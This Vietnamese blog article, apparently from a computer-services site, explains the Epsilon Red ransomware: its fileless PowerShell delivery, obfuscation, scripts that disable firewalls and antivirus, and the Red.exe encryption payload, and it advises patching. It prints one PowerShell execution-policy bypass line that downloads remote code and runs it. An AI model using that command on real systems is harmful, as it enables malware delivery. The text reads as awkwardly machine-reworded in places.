Banner Trường Tín Covid 19
Banner Trường Tín Covid 19 Mobile

Ransomware Epsilon Red là gì?

--
Web Tin Học Trường Tín có bài: Ransomware Epsilon Red là gì? Được đặt theo tên một nhân vật phản diện ít được biết đến trong truyện tranh Marvel, Epsilon Red gần đây đã được phát hiện bởi một công ty an ninh mạng có tên Sophos. Kể từ khi được phát hiện, ransomware đã tấn công hàng loạt tổ chức trên thế giới.

Bạn đã vá các server của mình chưa?

Một mối đe dọa ransomware mới, được coi là Epsilon Red, nhắm vào các máy chủ dựa theo Microsoft không được vá trong những trung tâm dữ liệu doanh nghiệp. Được đặt theo tên một nhân vật phản diện ít được biết đến trong truyện tranh Marvel, Epsilon Red mới đây đã được phát hiện bởi một công ty an ninh mạng có tên Sophos. Kể từ khi được phát hiện, ransomware đã tấn công đồng loạt tổ chức trên thế giới.

Fileless ransomware “núp bóng” PowerShell

Fileless ransomware là một dạng phần mềm độc hại thực thi bằng phương pháp đi cùng ứng dụng hợp pháp. Fileless malware dựa theo PowerShell sử dụng khả năng của PowerShell để load trực diện vào bộ nhớ của thiết bị. Tính năng này giúp bảo vệ ứng dụng độc hại trong script PowerShell không bị phát hiện.

Trong một kịch bản điển hình, khi một script thực thi, trước tiên nó phải được ghi vào ổ đĩa của thiết bị. Điều này cấp phép các giải pháp bảo mật điểm cuối phát hiện script. Vì PowerShell bị loại trừ khỏi các tiến trình thực thi script tiêu chuẩn, nên nó cũng đều có thể vượt qua bảo mật điểm cuối. Ngoài ra, việc sử dụng tham số bypass trong script PowerShell cho phép kẻ tấn công phá huỷ các hạn chế của script mạng.

Ví dụ về tham số bypass PowerShell là:

  powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))  

Như bạn cũng có thể có thể thấy, việc thiết kế các tham số bypass PowerShell kha khá dễ dàng.

Đáp lại việc này, Microsoft đã ban hành bản vá để giải quyết lỗ hổng thực thi phần mềm độc hại từ xa liên quan đến PowerShell. Tuy nhiên, các bản vá chỉ có hiệu quả khi chúng được sử dụng. Nhiều tổ chức đã thả lỏng các tiêu chí vá lỗi khiến môi trường của họ dễ trở thành mục tiêu bị tấn công. Thiết kế của Epsilon Red là để tận dụng mức độ dễ dẫn đến tấn công đó.

Tính có ích hai mặt của Epsilon Red

Vì Epsilon Red hữu hiệu nhất với các máy chủ Microsoft chưa được vá lỗi, ứng dụng độc hại có thể được sử dụng như 1 công cụ nhận biết và ransomware. Việc Epsilon có thành đạt trong một môi trường hay không hỗ trợ kẻ tiến công có ánh nhìn thâm thúy hơn về khả năng bảo mật của mục tiêu.

Nếu Epsilon thành công trong việc truy cập Microsoft Exchange Server, thì điều ấy cho thấy rằng tổ chức đó không tuân thủ các cách thức tốt nhất về bảo mật vá lỗi phổ biến. Đối với kẻ tấn công, điều đó cho biết phần còn sót lại của môi trường của mục đích có thể bị Epsilon xâm nhập dễ dàng như thế nào.

Epsilon Red sử dụng kỹ thuật Obfuscation để ẩn payload của nó. Obfuscation làm cho code không thể đọc được và được sử dụng trong phần mềm độc hại PowerShell để né khả năng đọc cao của script PowerShell. Với tính năng làm xáo trộn, các PowerShell alias cmdlet được dùng để gây khó khăn cho phần mềm diệt virus trong việc định vị các script độc hại trong nhật ký của PowerShell.

Ransomware Epsilon Red là gì?
Epsilon Red hữu hiệu nhất với các máy chủ Microsoft không được vá lỗi

Tuy nhiên, các script PowerShell bị đảo lộn vẫn cũng có thể được xác định. Một dấu hiệu thông dụng của một cuộc tiến công PowerShell Script sắp xảy ra là việc tạo ra một đối tượng WebClient. Kẻ tiến công sẽ tạo đối tượng WebClient trong code PowerShell để thiết lập kết nối bên phía ngoài đến một URL từ xa có chứa mã độc hại.

Nếu một tổ chức bị tấn công, thì khả năng tổ chức đó có đủ biện pháp bảo mật để phát hiện các script PowerShell bị đảo lộn là rất thấp. Ngược lại, nếu Epsilon Red không đột nhập được vào máy chủ, điều này sẽ cho kẻ tiến công biết rằng mạng của mục tiêu cũng có thể có thể giải mã phần mềm độc hại PowerShell 1 cách nhanh chóng, khiến cho cuộc tấn công trở nên kém giá trị hơn.

Sự xâm nhập mạng của Epsilon Red

Chức năng của Epsilon Red rất đơn giản. Phần mềm sử dụng 1 loạt những script Powershell để xâm nhập vào các máy chủ. Các script PowerShell này được đánh số từ 1.ps1 đến 12.ps1. Thiết kế của mỗi script PowerShell là để chuẩn bị một máy chủ đích cho payload cuối cùng.

Tất cả các script PowerShell trong Epsilon Red đều có mục tiêu riêng. Một trong những script PowerShell trong Epsilon Red được thiết kế để giải quyết các quy tắc tường lửa mạng của mục tiêu. Một phần mềm khác trong sê-ri này được thiết kế để gỡ cài đặt ứng dụng diệt virus của mục tiêu.

Như bạn có thể đoán, các script này hoạt động đồng bộ để đảm nói rằng khi payload được phân phối, mục tiêu sẽ không thể mau chóng dừng tiến độ của nó.

  • Ransomware Ryuk là gì? Làm ra sao để phòng tránh nó?

Truyền payload

Khi các script PowerShell của Epsilon đã mở đường cho payload cuối cùng của nó, nó sẽ có phân phối dưới dạng một extension, Red.exe . Khi nó xâm nhập vào máy chủ, Red.exe sẽ quét các file của máy server và tạo danh sách các đường dẫn thư mục cho từng file mà nó phát hiện ra. Sau khi tạo danh sách, các tiến trình con được tạo từ file phần mềm độc hại chính cho từng đường dẫn thư mục trong danh sách. Sau đó, mỗi file con ransomware mã hóa một đường dẫn thư mục từ file danh sách.

Sau khi mọi thứ các đường dẫn thư mục trong bản kê của Epson đã được mã hóa, một file .txt sẽ có để lại để thông báo cho mục đích và nêu yêu cầu của kẻ tấn công. Ngoài ra, tất cả các nút mạng có thể truy cập được kết nối với máy chủ bị đột nhập sau đó sẽ bị xâm nhập và khả năng đột nhập của phần mềm độc hại vào mạng cũng có thể tăng lên.

Ai đứng sau Epsilon Red?

Ransomware Epsilon Red là gì?
Hiện vẫn không rõ danh tánh của những kẻ tấn công đứng sau Epsilon Red

Hiện vẫn chưa rõ danh tánh của những kẻ tấn công đứng sau Epsilon Red. Tuy nhiên, một số manh mối cho biết nguồn gốc của những kẻ tấn công. Manh mối trước mắt là tên của ứng dụng độc hại. Epsilon Red là một nhân vật phản diện X-Men với câu chuyện có nguồn gốc từ Nga.

Manh mối thứ hai nằm trong ghi chú đòi tiền chuộc file .txt mà code để lại. Nó tựa như như chú thích được để lại bởi một băng đảng ransomware mang tên REvil. Tuy nhiên, sự trùng lặp này sẽ không chỉ ra rằng những kẻ tiến công là thành viên của băng nhóm này. REvil vận hành một hoạt động RaaS (Ransomware as a service) trong đó các chi nhánh trả tiền cho REvil để truy cập vào phần mềm độc hại của nó.

Bảo vệ bản thân khỏi Epsilon Red

Cho đến nay, Epsilon Red đã đột nhập thành công các máy server chưa được vá lỗi. Điều này còn có nghĩa là một trong những cách bảo vệ tốt nhất chống lại Epsilon Red và ứng dụng độc hại ransomware tương tự, là đáp ứng rằng môi trường của bạn được quản lý đúng cách. Ngoài ra, có 1 giải pháp bảo mật cũng đều có thể mau chóng giải mã các script PowerShell sẽ là một bổ sung hữu ích cho môi trường của bạn.

  • Tại sao Ransomware là bản hack hoàn hảo?
  • Ransomware Task Force (RTF) là gì?
  • Ryuk: Chủng mã độc thu lợi bất chính cao ‘khó tin’, có trường hợp lên tới 34 triệu USD
  • Pay2Key: Chủng ransomware có thể mã hóa toàn bộ hệ thống mạng trong một giờ
  • RegretLocker: Chủng ransomware mới nhắm mục tiêu đến hệ thống máy ảo Windows

Ransomware,Epsilon Red,ransomware Epsilon Red,ransomware Epsilon Red là gì

Nội dung Ransomware Epsilon Red là gì? được tổng hợp sưu tầm biên tập bởi: Tin Học Trường Tín. Mọi ý kiến vui lòng gửi Liên Hệ cho truongtin.top để điều chỉnh. truongtin.top tks.

Bài Viết Liên Quan


Bài Viết Khác

--